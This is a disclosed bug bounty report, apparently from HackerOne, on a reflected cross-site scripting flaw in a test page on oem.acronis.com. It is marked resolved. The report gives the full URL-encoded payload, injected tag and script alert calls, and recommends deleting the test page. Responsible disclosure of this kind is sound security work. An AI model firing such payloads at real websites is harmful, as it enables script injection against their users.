[oem.acronis.com] Reflected Cross Site Scripting

Disclosed: 2024-12-28 08:57:12 By darkdream To acronis

Medium

Vulnerability Details

## Summary Hi Acronis team i have found a XSS reflected in:oem.acronis.com ## Steps To Reproduce 1. for xss go to link : ``` https://oem.acronis.com/test/testenv.html/%3C/pre%3E%3Cisindex%20type%3Dimage%20src%3D1%20onerror%3Dalert%289166%29%3E%3Cscript%3Ealert(origin)%3C/script%3E ``` ##POC: {F2446065} ## Recommendations delete test page from your server ## Impact Attacker can execute JS code on the Victim Behalf.

Actions

View on HackerOne

Report Stats

Report ID: 2038943
State: Closed
Substate: resolved
Upvotes: 1

[oem.acronis.com] Reflected Cross Site Scripting

Vulnerability Details

Actions

Report Stats

Share this report